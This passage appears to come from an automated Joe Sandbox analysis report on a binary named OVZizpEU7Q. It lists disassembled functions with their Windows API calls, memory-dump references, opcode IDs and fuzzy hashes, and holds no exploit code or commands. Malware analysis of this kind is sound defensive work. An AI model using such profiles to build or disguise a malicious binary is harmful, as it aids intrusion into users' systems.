                                                                                        • Instruction Fuzzy Hash: F2114F71600109AFCB00FBA5D946CEE77B9EF04314B54847AF505B72A2DB389E14CB69
                                                                                        Function 00458B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00458B61
                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458B73
                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458B89
                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458BA4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 3850602802-0
                                                                                        • Opcode ID: ca17c677d33199d8ade5de32726d6ec6320cad89c97852bedaa9fe676a546a7f
                                                                                        • Instruction ID: 6d6e4feeaee75d02a1ec4dd614e497ad2765f264ac6e3ed00c825e9843e5ba14
                                                                                        • Opcode Fuzzy Hash: ca17c677d33199d8ade5de32726d6ec6320cad89c97852bedaa9fe676a546a7f
                                                                                        • Instruction Fuzzy Hash: 56113A79900218BFDB10DB95C884EAEBB78EB48710F2041A6E900B7250DA716E15DB94
                                                                                        Function 00401290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                        • DefDlgProcW.USER32(?,00000020,?), ref: 004012D8
                                                                                        • GetClientRect.USER32(?,?), ref: 0043B5FB
                                                                                        • GetCursorPos.USER32(?), ref: 0043B605
                                                                                        • ScreenToClient.USER32(?,?), ref: 0043B610
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Client$CursorLongProcRectScreenWindow
                                                                                        • String ID:
                                                                                        • API String ID: 4127811313-0
                                                                                        • Opcode ID: 1c8f769d0dee53fb8c778101d630ad27ed939e462680dcfd79beede70ddeeb32
                                                                                        • Instruction ID: ee9d34d9398b5f91fab5137b757b2ab9dbcc007e8162b1c14587a54292e2d527
                                                                                        • Opcode Fuzzy Hash: 1c8f769d0dee53fb8c778101d630ad27ed939e462680dcfd79beede70ddeeb32
                                                                                        • Instruction Fuzzy Hash: 39112B39510059FBCB00EF99D8899AE77B8FB05300F4008AAF901F7291D734BA569BA9
                                                                                        Function 0045D831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0045D84D
                                                                                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0045D864
                                                                                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0045D879
                                                                                        • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0045D897
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Type$Register$FileLoadModuleNameUser
                                                                                        • String ID:
                                                                                        • API String ID: 1352324309-0
                                                                                        • Opcode ID: f854c2ae4ddfb44975126c45fe272911be12f4fa913ee62eb5c826514f2548e5
                                                                                        • Instruction ID: 3b05f8a101c890c8fbc83375acaac98503a8deaba450bce75694a4266b83033e
                                                                                        • Opcode Fuzzy Hash: f854c2ae4ddfb44975126c45fe272911be12f4fa913ee62eb5c826514f2548e5
                                                                                        • Instruction Fuzzy Hash: 48115E75A05304DBE330AF50EC08F97BBBCEF00B01F10896EA926D6151D7B4E94D9BA5
                                                                                        Function 00436FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                        • String ID:
                                                                                        • API String ID: 3016257755-0
                                                                                        • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                        • Instruction ID: 3d94be51af7e819a6a5def82be0e086b27bd99855e7e965629bee2c507946819
                                                                                        • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                        • Instruction Fuzzy Hash: 78014EB244414ABBCF2A5E84CC41CEE3F72BB1C354F599416FA9858131D23AD9B1AB85
                                                                                        Function 0048B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetWindowRect.USER32(?,?), ref: 0048B2E4
                                                                                        • ScreenToClient.USER32(?,?), ref: 0048B2FC
                                                                                        • ScreenToClient.USER32(?,?), ref: 0048B320
                                                                                        • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0048B33B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClientRectScreen$InvalidateWindow
                                                                                        • String ID:
                                                                                        • API String ID: 357397906-0
                                                                                        • Opcode ID: e8173e98fc73e507b6a04d2f7e54522757b65c9b70d93ac78b94b59699abf8f9
                                                                                        • Instruction ID: e0f35f64d62337ec24ef524e52db7040af9c6cc02db1932b8591958b9ea84988
                                                                                        • Opcode Fuzzy Hash: e8173e98fc73e507b6a04d2f7e54522757b65c9b70d93ac78b94b59699abf8f9
                                                                                        • Instruction Fuzzy Hash: B9117775D00209EFDB01DF99C444AEEBBF5FF18310F104566E914E3220D735AA558F94
                                                                                        Function 00466BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 00466BE6
                                                                                          • Part of subcall function 004676C4: _memset.LIBCMT ref: 004676F9
                                                                                        • _memmove.LIBCMT ref: 00466C09
                                                                                        • _memset.LIBCMT ref: 00466C16
                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00466C26
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 48991266-0
                                                                                        • Opcode ID: edf19e1ede3b3e611382947217f22c9f8674c26c836af00265cbaa5f5bcd5e3d
                                                                                        • Instruction ID: 06c116e41b1fbc97defe022da98efa456519ca017efd3746de7cd937a477406a
                                                                                        • Opcode Fuzzy Hash: edf19e1ede3b3e611382947217f22c9f8674c26c836af00265cbaa5f5bcd5e3d
                                                                                        • Instruction Fuzzy Hash: ACF0547A200110BBCF016F56EC85A8ABF29EF45325F4480A9FE085E227D775E811CBB9
                                                                                        Function 00402218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetSysColor.USER32(00000008), ref: 00402231
                                                                                        • SetTextColor.GDI32(?,000000FF), ref: 0040223B
                                                                                        • SetBkMode.GDI32(?,00000001), ref: 00402250
                                                                                        • GetStockObject.GDI32(00000005), ref: 00402258
                                                                                        • GetWindowDC.USER32(?,00000000), ref: 0043BE83
                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 0043BE90
                                                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 0043BEA9
                                                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 0043BEC2
                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 0043BEE2
                                                                                        • ReleaseDC.USER32(?,00000000), ref: 0043BEED
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1946975507-0
                                                                                        • Opcode ID: 1c24b0d26c008fe2912d49eeb423ba9ae618f885d5077ddc5dea034ec8dbd8ce
                                                                                        • Instruction ID: 54194c7dea5641a5760446fc0b471bd43188e270dcc7ade6c1867ff591c8ccba
                                                                                        • Opcode Fuzzy Hash: 1c24b0d26c008fe2912d49eeb423ba9ae618f885d5077ddc5dea034ec8dbd8ce
                                                                                        • Instruction Fuzzy Hash: 8FE03932104244EADB215FA8EC4D7D93B10EB05332F10837AFB69980E187B54994DB16
                                                                                        Function 00458712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCurrentThread.KERNEL32 ref: 0045871B
                                                                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,004582E6), ref: 00458722
                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004582E6), ref: 0045872F
                                                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,004582E6), ref: 00458736
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentOpenProcessThreadToken
                                                                                        • String ID:
                                                                                        • API String ID: 3974789173-0
                                                                                        • Opcode ID: c13fcb7cbc4fcf9024c8800305f1294cb96d5ee06e78be5c1b908a636c14961a
                                                                                        • Instruction ID: 27e516f12521b82670cd12e73380cd235ac9fe5f10b87aab6d4880cb8d6f589a
                                                                                        • Opcode Fuzzy Hash: c13fcb7cbc4fcf9024c8800305f1294cb96d5ee06e78be5c1b908a636c14961a
                                                                                        • Instruction Fuzzy Hash: 69E086366113119FD7205FB45D0CB5B3BACEF55792F244C3CB645D9051DA388449C754
                                                                                        Function 00406240 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: %I
                                                                                        • API String ID: 0-63094095
                                                                                        • Opcode ID: 7d9f71a51cf9ccae10632cb1c333b25bb238ed028a66e8e460a60c47fc14a1ae
                                                                                        • Instruction ID: fc9b66e0bafda5900f64632d1c19c64e360ede111f7e08ffc6918f9b7723571d
                                                                                        • Opcode Fuzzy Hash: 7d9f71a51cf9ccae10632cb1c333b25bb238ed028a66e8e460a60c47fc14a1ae
                                                                                        • Instruction Fuzzy Hash: F7B19D759001099ACF24EF95C8819EEB7B5EF44314F11403BE942B72D1DB3C9AA6CB9E
                                                                                        Function 0047AEA2 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: __itow_s
                                                                                        • String ID: xbL$xbL
                                                                                        • API String ID: 3653519197-3351732020
                                                                                        • Opcode ID: 90ba7ef9f8d9146918a72878262fd05d6879b866cf0277a0a7876aadaa269471
                                                                                        • Instruction ID: dfe480003ad9fd5cab9b7df9ebde8448aad3da8901d64dd9d19fd2ed475b7079
                                                                                        • Opcode Fuzzy Hash: 90ba7ef9f8d9146918a72878262fd05d6879b866cf0277a0a7876aadaa269471
                                                                                        • Instruction Fuzzy Hash: DFB16E70A00105EFCB14DF55C890EEAB7B9EF58344F14C46AF949AB291EB38E941CB99
                                                                                        Function 0046AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                                                                          • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                          • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                        • __wcsnicmp.LIBCMT ref: 0046B02D
                                                                                        • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0046B0F6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                        • String ID: LPT
                                                                                        • API String ID: 3222508074-1350329615
                                                                                        • Opcode ID: d30bb05f983bd9a15c5a3ce658688309f82e14a56a6b12c00daa3c40a9bd9b45
                                                                                        • Instruction ID: 83c5630e61c03cc96fa61f6b78faa4233f6e1162f12f5b466cba6b991e1c6364
                                                                                        • Opcode Fuzzy Hash: d30bb05f983bd9a15c5a3ce658688309f82e14a56a6b12c00daa3c40a9bd9b45
                                                                                        • Instruction Fuzzy Hash: EF617475A00215AFCB14DF54C851EEEB7B4EF09350F10806AF916EB391E738AE85CB99
                                                                                        Function 00412957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • Sleep.KERNEL32(00000000), ref: 00412968
                                                                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 00412981
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: GlobalMemorySleepStatus
                                                                                        • String ID: @
                                                                                        • API String ID: 2783356886-2766056989
                                                                                        • Opcode ID: cf15a7ea090bffc9490279112080cc94ce2022ef9ba38fcf57aa55417a2360bc
                                                                                        • Instruction ID: a5a81f9d260a569e77baff687d6fe7a0f73e349ca0d117409dcb6840122a66be
                                                                                        • Opcode Fuzzy Hash: cf15a7ea090bffc9490279112080cc94ce2022ef9ba38fcf57aa55417a2360bc
                                                                                        • Instruction Fuzzy Hash: CB5159B24187449BD320EF15D885BAFBBE8FB85344F41886DF2D8911A1DB74892CCB5A
                                                                                        Function 00469734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00404F0B: __fread_nolock.LIBCMT ref: 00404F29
                                                                                        • _wcscmp.LIBCMT ref: 00469824
                                                                                        • _wcscmp.LIBCMT ref: 00469837
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscmp$__fread_nolock
                                                                                        • String ID: FILE
                                                                                        • API String ID: 4029003684-3121273764
                                                                                        • Opcode ID: 61b9d9cc128ec34272c66af4fd2f1fdd343520f55c014a8993afaf0baf9333d9
                                                                                        • Instruction ID: cde52b3ca8712c625de002da450250744642bb9d8a04c3b997614ed6dba67ccd
                                                                                        • Opcode Fuzzy Hash: 61b9d9cc128ec34272c66af4fd2f1fdd343520f55c014a8993afaf0baf9333d9
                                                                                        • Instruction Fuzzy Hash: 8C41A771A0021ABADF20AAA5CC45FEF77BDDF85714F00047EB604B7181DA79AD058B69
                                                                                        Function 00440574 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClearVariant
                                                                                        • String ID: DdL$DdL
                                                                                        • API String ID: 1473721057-91670653
                                                                                        • Opcode ID: 642cbb757c798b464e218aa70decae5e6efc434086f495e8bbeb8dcdbabf2780
                                                                                        • Instruction ID: 8cf85b897da21b35b232154f37a53a393289a03a8f02d27ab87a98346ee69310
